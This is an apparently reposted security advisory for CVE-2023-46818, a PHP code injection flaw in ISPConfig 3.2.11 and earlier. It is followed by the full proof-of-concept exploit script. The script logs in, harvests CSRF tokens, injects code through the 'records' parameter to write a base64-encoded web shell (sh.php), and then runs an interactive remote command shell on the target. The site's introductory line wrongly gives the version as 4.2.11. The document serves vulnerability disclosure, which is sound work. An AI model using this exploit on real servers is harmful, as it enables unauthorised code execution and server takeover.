ISPConfig 3.2.11 PHP Code Injection

渗透技巧 5个月前 admin

35 0 0

ISPConfig versions 4.2.11 and below suffer from a PHP code injection vulnerability in language_edit.php.
ISPConfig 版本 4.2.11 及更低版本在 language_edit.php 中存在 PHP 代码注入漏洞。

------------------------------------------------------------------------
ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability
------------------------------------------------------------------------


[-] Software Link:

https://www.ispconfig.org


[-] Affected Versions:

Version 3.2.11 and prior versions.


[-] Vulnerabilities Description:

User input passed through the "records" POST parameter to
/admin/language_edit.php is not properly sanitized before being used
to dynamically generate PHP code that will be executed by the
application. This can be exploited by malicious administrator users to
inject and execute arbitrary PHP code on the web server.


[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2023-46818.php
(Packet Storm Editor Note: See bottom of this file for PoC)


[-] Solution:

Upgrade to version 3.2.11p1 or later.


[-] Disclosure Timeline:

[25/10/2023] - Vendor notified
[26/10/2023] - Version 3.2.11p1 released
[27/10/2023] - CVE identifier assigned
[07/12/2023] - Publication of this advisory


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2023-46818 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-13


[-] Other References:

https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/



--- CVE-2023-46818.php PoC ---

<?php

/*
    ------------------------------------------------------------------------
    ISPConfig <= 3.2.11 (language_edit.php) PHP Code Injection Vulnerability
    ------------------------------------------------------------------------

    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://www.ispconfig.org

    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    User input passed through the "records" POST parameter to /admin/language_edit.php is
    not properly sanitized before being used to dynamically generate PHP code that will be
    executed by the application. This can be exploited by malicious administrator users to
    inject and execute arbitrary PHP code on the web server.

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2023-13
*/

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Username> <Password>\n\n");

list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

print "[+] Logging in with username '{$user}' and password '{$pass}'\n";

@unlink('./cookies.txt');

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "{$url}login/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".urlencode($user)."&password=".urlencode($pass)."&s_mod=login");

if (preg_match('/Username or Password wrong/i', curl_exec($ch))) die("[-] Login failed!\n");

print "[+] Injecting shell\n";

$__phpcode = base64_encode("<?php print('____'); passthru(base64_decode(\$_SERVER['HTTP_C'])); print('____'); ?>");
$injection = "'];file_put_contents('sh.php',base64_decode('{$__phpcode}'));die;#";
$lang_file = str_shuffle("qwertyuioplkjhgfdsazxcvbnm").".lng";

curl_setopt($ch, CURLOPT_URL, "{$url}admin/language_edit.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}");

$res = curl_exec($ch);

if (!preg_match('/_csrf_id" value="([^"]+)"/i', $res, $csrf_id)) die("[-] CSRF ID not found!\n");
if (!preg_match('/_csrf_key" value="([^"]+)"/i', $res, $csrf_key)) die("[-] CSRF key not found!\n");

curl_setopt($ch, CURLOPT_POSTFIELDS, "lang=en&module=help&lang_file={$lang_file}&_csrf_id={$csrf_id[1]}&_csrf_key={$csrf_key[1]}&records[%5C]=".urlencode($injection));

curl_exec($ch);

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, "{$url}admin/sh.php");
curl_setopt($ch, CURLOPT_POST, false);

while(1)
{
    print "\nispconfig-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode($cmd)]);
    preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}